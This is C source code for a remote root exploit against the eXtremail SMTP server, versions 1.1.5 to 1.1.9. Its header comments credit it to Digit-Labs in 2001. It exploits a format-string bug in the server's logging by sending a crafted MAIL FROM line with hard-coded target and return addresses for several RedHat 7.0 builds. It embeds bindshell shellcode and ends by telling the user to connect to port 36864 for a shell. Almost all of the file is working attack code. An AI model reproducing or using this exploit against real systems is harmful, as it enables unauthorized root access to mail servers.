/* eXtremail-exp.c * * - eXtremail v1.1.5-9 Remote Root Exploit (x86) - * * - Tested on: RedHat 7.0 eXtremail v1.1.5 * RedHat 7.0 eXtremail v1.1.6 * RedHat 7.0 eXtremail v1.1.7 * RedHat 7.0 eXtremail v1.1.8 * RedHat 7.0 eXtremail v1.1.9 * NOT VULNERABLE eXtremail v1.1.10 * * Copyright (c) 2001 by* * eXtremail v1.1.5+ has a format string problem * in flog(). This problem affects all user commands * (helo/ehlo/mail from:/rcpt to:), and is caused * by an improper fprintf() to the servers logfile. * * Buffers for helo/ehlo are too small (except v1.1.5), * therefore we use mail from: instead :). * * Note: Return Address's are quite tight due to the small * buffers. Returning to the Heap is possible but * is VERY unstable. * * Greets: mjm, all@alldas.de, teleh0r, grazer, cmds, * gollum, #!digit-labs * * http://www.digit-labs.org/ -- Digit-Labs 2001!@$! */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define NOP 0x41 #define NUMVULN 4 #define OFFSET 0 #define PORT 25 void banner(); void mkfmt(); int opensocket(char *); void usage(); char buf[520]; int buflength, type = 0, sock; unsigned long target, retaddr; unsigned char shellcode[]= /* lamagra bindshell code */ "\xeb\x6e\x5e\x29\xc0\x89\x46\x10" "\x40\x89\xc3\x89\x46\x0c\x40\x89" "\x46\x08\x8d\x4e\x08\xb0\x66\xcd" "\x80\x43\xc6\x46\x10\x10\x88\x46" "\x08\x31\xc0\x31\xd2\x89\x46\x18" "\xb0\x90\x66\x89\x46\x16\x8d\x4e" "\x14\x89\x4e\x0c\x8d\x4e\x08\xb0" "\x66\xcd\x80\x89\x5e\x0c\x43\x43" "\xb0\x66\xcd\x80\x89\x56\x0c\x89" "\x56\x10\xb0\x66\x43\xcd\x80\x86" "\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0" "\x3f\x41\xcd\x80\xb0\x3f\x41\xcd" "\x80\x88\x56\x07\x89\x76\x0c\x87" "\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80" "\xe8\x8d\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68"; /* target address's -> objdump -R smtpd | grep "fflush" */ struct { char *name; unsigned long target; unsigned long retaddr; int padding; int buflength; } targets[] = { { "RedHat 7.0 eXtremail v1.1R5", 0x080864e0, 0xbf1ff64a, 1, 500}, { "RedHat 7.0 eXtremail v1.1R6", 0x08089d5c, 0xbf1ff5d6, 1, 266}, { "RedHat 7.0 eXtremail v1.1R7", 0x0808b3fc, 0xbf1ff5d6, 1, 266}, { "RedHat 7.0 eXtremail v1.1R8", 0x0808b6fc, 0xbf1ff5d6, 1, 266}, { "RedHat 7.0 eXtremail v1.1R9", 0x08088890, 0xbf1ff5d6, 1, 266}, { 0 } }; void banner() { fprintf(stderr, "\neXtremail V1.1R5-9 remote root exploit\n"); fprintf(stderr, "by: \n"); fprintf(stderr, "Copyright (c) 2001 Digit-Labs!@#$!\n"); fprintf(stderr, "http://www.digit-labs.org\n\n"); } void mkfmt() { int i, j = 0, num; int bytesofar; int fmtints[4]; char *bufptr; unsigned char temp[4]; bytesofar = 35 + targets[type].padding; bufptr = &buf[strlen(buf)]; temp[0] = (unsigned char) (target & 0x000000ff); temp[1] = (unsigned char)((target & 0x0000ff00) >> 8); temp[2] = (unsigned char)((target & 0x00ff0000) >> 16); temp[3] = (unsigned char)((target & 0xff000000) >> 24); for(i = 0; i < 4; i++) { sprintf(bufptr, "%c%c%c%c", temp[0], temp[1], temp[2], temp[3]); bufptr += 4; temp[0]++; } fmtints[0] = (int) (retaddr & 0x000000ff); fmtints[1] = (int)((retaddr & 0x0000ff00) >> 8); fmtints[2] = (int)((retaddr & 0x00ff0000) >> 16); fmtints[3] = (int)((retaddr & 0xff000000) >> 24); for(i = 0; i < 4; i++) { num = 0; if(fmtints[i] - bytesofar < 10) { while(num != 1) { fmtints[i] = (fmtints[i] + 0x100); if(fmtints[i] - bytesofar > 9) { fmtints[i] -= bytesofar; bytesofar += fmtints[i]; num = 1; } } } else { fmtints[i] -= bytesofar; bytesofar += fmtints[i]; } } sprintf(bufptr, "%%.%du%%38$n%%.%du%%39$n%%.%du%%40$n%%.%du%%41$n", fmtints[0], fmtints[1], fmtints[2], fmtints[3]); for(i = strlen(buf); i < buflength - strlen(shellcode) - 1; i++) buf[i] = NOP; for(i = i; i < buflength - 1; i++) { buf[i] = shellcode[j]; j++; } buf[buflength - 1] = '\n'; buf[buflength] = '\0'; write(sock, buf, strlen(buf)); } int opensocket(char *host) { int s; struct sockaddr_in remote_sin; struct hostent *he; if((s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket()"); return -1; } memset((char *)&remote_sin, 0, sizeof(remote_sin)); if((he = gethostbyname(host)) != NULL) memcpy((char *)&remote_sin.sin_addr, he->h_addr, he->h_length); else if((remote_sin.sin_addr.s_addr = inet_addr(host)) < 0) { perror("gethostbyname()/inet_addr()"); return -1; } remote_sin.sin_family = PF_INET; remote_sin.sin_port = htons(PORT); if(connect(s, (struct sockaddr *)&remote_sin, sizeof(remote_sin)) == -1) { perror("connect()"); close(s); return -1; } return s; } void usage() { int i; fprintf(stderr, "Usage: ./extremail [type]\n"); fprintf(stderr, "\nTargets:\n"); for (i = 0; targets[i].name; i++) fprintf(stderr, "\t%d.\t%s\n", i, targets[i].name); fprintf(stderr, "\n"); exit(0); } int main (int argc, char *argv[]) { char *host; int i; banner(); if(argc < 2) usage(); if(argc >= 3) type = atoi(argv[2]); if(type > NUMVULN) type = 0; host = argv[1]; buflength = targets[type].buflength; target = targets[type].target; retaddr = targets[type].retaddr + OFFSET; fprintf(stderr, "Target:\t\t%s\nType:\t\t%s\n", host, targets[type].name); fprintf(stderr, "Target Address:\t%p\nReturn Address:\t%p\nOffset:\t\t%d\n", target, retaddr, OFFSET); fprintf(stderr, "Buflength:\t%d\n", buflength); if ((sock = opensocket(host)) <= 0) return -1; fprintf(stderr, "\nConnected....\n"); memcpy(buf, "MAIL FROM:<", 11); for(i = 0; i < targets[type].padding; i++) buf[strlen(buf)] = 0x61; sleep(1); write(sock, "HELO digit-labs.org!@#$!\n", 26); sleep(1); mkfmt(); sleep(1); close(sock); fprintf(stderr, "\n[1] sent payload....\n"); fprintf(stderr, "[2] waiting....\n"); sleep(2); fprintf(stderr, "[3] nc %s 36864 for shell....\n\n", host); return; }